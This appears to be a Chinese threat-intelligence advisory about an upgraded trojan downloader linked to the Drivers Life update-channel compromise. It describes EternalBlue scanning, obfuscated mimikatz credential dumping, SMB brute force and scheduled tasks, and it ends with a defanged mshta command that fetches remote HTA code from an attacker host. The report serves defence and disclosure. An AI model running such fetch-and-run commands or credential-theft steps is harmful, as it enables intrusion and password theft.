一、概述
御见威胁情报中心1月25日再次监测到曾利用驱动人生升级通道传播的木马下载器攻击方法再升级。
本次升级主要变化在于攻击模块,木马在之前的版本上,新增计划任务“DnsScan”,在其中将永恒之蓝攻击模块C:\Windows\Temp\svchost.exe设置为木马执行当天7:05开始,之后每个一小时执行一次。
该木马团伙持续活跃,最严重的一次破坏是入侵驱动人生公司,篡改商业软件的升级配置,利用正规软件的升级通道传播病毒。在这个木马传播渠道被封堵之后,该团伙仍在利用其他传播渠道持续改进该木马下载器。
该团伙的历次活动,均被腾讯御见威胁情报中心捕获:
二、技术分析
升级后的攻击模块svchost.exe除了利用永恒之蓝漏洞对内网以及外网机器进行扫描攻击外,还新增了以下功能:
1、利用powershell版黑客工具mimikatz抓取用户机器域登录密码进行横向传播
创建m.ps1并将混淆后的mimikatz工具代码写入。
将利用工具抓取到的用户域登录密码保存到mkatz.ini。
2、攻击模块尝试通过内置的弱密码字典尝试SMB爆破远程登录
3、创建计划任务执行远程hta代码
mshtahxxp://w.beahh.